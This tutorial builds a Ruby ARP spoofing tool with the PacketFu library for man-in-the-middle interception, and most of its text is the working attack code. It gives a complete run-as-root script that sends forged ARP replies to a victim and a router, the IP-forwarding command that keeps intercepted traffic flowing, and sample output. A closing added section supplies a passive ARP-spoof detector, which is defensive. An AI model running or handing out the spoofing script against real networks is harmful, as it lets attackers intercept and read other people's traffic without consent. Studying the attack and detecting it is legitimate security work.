ARP Spoofing
As you know, the ARP spoofing attack is at the core of MitM attacks. In this part we'll learn how to write a simple and effective ARP spoofer tool to use in later spoofing attacks.

Scenario

We have 3 machines in this scenario, as shown below.

```text
|Attacker|
    |
    v
|Victim| -----------------> |Router| ---> Internet
```
Here is the list of IP and MAC addresses of each of them in the following table:

| Host/Info | IP Address    | MAC Address       |
|-----------|---------------|-------------------|
| Attacker  | 192.168.0.100 | 3C:77:E6:68:66:E9 |
| Victim    | 192.168.0.21  | 00:0C:29:38:1D:61 |
| Router    | 192.168.0.1   | 00:50:7F:E6:96:20 |
To get our (the attacker's) interface information:

```ruby
info = PacketFu::Utils.whoami?(:iface => "wlan0")
```
This returns a hash:

```ruby
{:iface=>"wlan0",
 :pcapfile=>"/tmp/out.pcap",
 :eth_saddr=>"3c:77:e6:68:66:e9",
 :eth_src=>"<w\xE6hf\xE9",
 :ip_saddr=>"192.168.0.13",
 :ip_src=>3232235533,
 :ip_src_bin=>"\xC0\xA8\x00\r",
 :eth_dst=>"\x00P\x7F\xE6\x96 ",
 :eth_daddr=>"00:50:7f:e6:96:20"}
```
So you can extract this information like any other hash: info[:iface], info[:ip_saddr], info[:eth_saddr], etc.
Building the victim's ARP packet

```ruby
# Build Ethernet header
arp_packet_victim = PacketFu::ARPPacket.new
arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61" # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61" # the victim's MAC address
arp_packet_victim.arp_saddr_ip = "192.168.0.1" # the router's IP
arp_packet_victim.arp_daddr_ip = "192.168.0.21" # the victim's IP
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply
```
Building the router's ARP packet

```ruby
# Build Ethernet header
arp_packet_router = PacketFu::ARPPacket.new
arp_packet_router.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_router.eth_daddr = "00:50:7F:E6:96:20" # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20" # the router's MAC address
arp_packet_router.arp_saddr_ip = "192.168.0.21" # the victim's IP
arp_packet_router.arp_daddr_ip = "192.168.0.1" # the router's IP
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply
```
Run the ARP spoofing attack

```ruby
# Send our packets through the wire
while true
  sleep 1
  puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  arp_packet_victim.to_w(info[:iface])
  puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  arp_packet_router.to_w(info[:iface])
end
```
Source
Wrapping it all together; run as root:
```ruby
#!/usr/bin/env ruby
#
# ARP Spoof Basic script
#
require 'packetfu'

attacker_mac = "3C:77:E6:68:66:E9"
victim_ip = "192.168.0.21"
victim_mac = "00:0C:29:38:1D:61"
router_ip = "192.168.0.1"
router_mac = "00:50:7F:E6:96:20"

info = PacketFu::Utils.whoami?(:iface => "wlan0")
#
# Victim
#
# Build Ethernet header
arp_packet_victim = PacketFu::ARPPacket.new
arp_packet_victim.eth_saddr = attacker_mac # attacker MAC address
arp_packet_victim.eth_daddr = victim_mac # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = attacker_mac # attacker MAC address
arp_packet_victim.arp_daddr_mac = victim_mac # the victim's MAC address
arp_packet_victim.arp_saddr_ip = router_ip # the router's IP
arp_packet_victim.arp_daddr_ip = victim_ip # the victim's IP
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply

#
# Router
#
# Build Ethernet header
arp_packet_router = PacketFu::ARPPacket.new
arp_packet_router.eth_saddr = attacker_mac # attacker MAC address
arp_packet_router.eth_daddr = router_mac # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = attacker_mac # attacker MAC address
arp_packet_router.arp_daddr_mac = router_mac # the router's MAC address
arp_packet_router.arp_saddr_ip = victim_ip # the victim's IP
arp_packet_router.arp_daddr_ip = router_ip # the router's IP
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply

while true
  sleep 1
  puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  arp_packet_victim.to_w(info[:iface])
  puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  arp_packet_router.to_w(info[:iface])
end
```
Note: Don't forget to enable packet forwarding on your system, otherwise the victim's traffic stops at the attacker and the victim cannot browse the internet:

```shell
echo "1" > /proc/sys/net/ipv4/ip_forward
```
Output; time to start wiresharking ;)

```text
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
.
.
.
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
```
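Seen from the defender's side, what the script above puts on the wire every second is an unsolicited ARP reply announcing the router's IP with the attacker's MAC. The following added example (my own code, not part of the original page, and not using PacketFu) parses raw Ethernet/ARP frames and flags exactly that conflict against a pinned gateway entry; the frames it is fed are constructed to match the scenario table above.

```ruby
# Added example (not from the original page): a passive ARP-spoof detector that
# parses raw Ethernet/ARP frames without packetfu and alerts when an IP already
# in its table (seeded with the real gateway MAC) is announced by another MAC.
ETH_TYPE_ARP = 0x0806
ARP_REPLY    = 2
def mac_str(bytes)
  bytes.unpack1('H*').scan(/../).join(':')
end

# Returns a hash for an ARP frame (14-byte Ethernet header + 28-byte ARP body), else nil.
def parse_arp(frame)
  frame = frame.b   # force byte (not character) indexing
  return nil if frame.bytesize < 42 || frame[12, 2].unpack1('n') != ETH_TYPE_ARP
  arp = frame[14, 28]
  { eth_src:    mac_str(frame[6, 6]),
    opcode:     arp[6, 2].unpack1('n'),
    sender_mac: mac_str(arp[8, 6]),
    sender_ip:  arp[14, 4].unpack('C4').join('.'),
    target_ip:  arp[24, 4].unpack('C4').join('.') }
end

# ip => mac table: trusted entries are pinned, others are learned from the first reply seen.
class ArpWatch
  attr_reader :alerts, :table
  def initialize(trusted = {})
    @table  = trusted.transform_values(&:downcase)
    @alerts = []
  end
  def observe(frame)
    pkt = parse_arp(frame)
    return nil unless pkt && pkt[:opcode] == ARP_REPLY
    known = @table[pkt[:sender_ip]]
    if known.nil?
      @table[pkt[:sender_ip]] = pkt[:sender_mac]
    elsif known != pkt[:sender_mac]
      @alerts << "#{pkt[:sender_ip]} announced by #{pkt[:sender_mac]}, expected #{known}"
    end
    pkt
  end
end

# Constructed ARP reply frame (same layout PacketFu::ARPPacket writes), used only as test input.
def sample_reply(src_mac, dst_mac, sender_ip, target_ip)
  mac = ->(m) { [m.delete(':')].pack('H*') }
  ip  = ->(a) { a.split('.').map(&:to_i).pack('C4') }
  mac[dst_mac] + mac[src_mac] + [ETH_TYPE_ARP].pack('n') +
    [1, 0x0800, 6, 4, ARP_REPLY].pack('nnCCn') +
    mac[src_mac] + ip[sender_ip] + mac[dst_mac] + ip[target_ip]
end
```

In practice the frames would come from a capture on the monitored interface; pinning the gateway entry is what turns the attacker's gratuitous replies into an alert instead of a silently updated table.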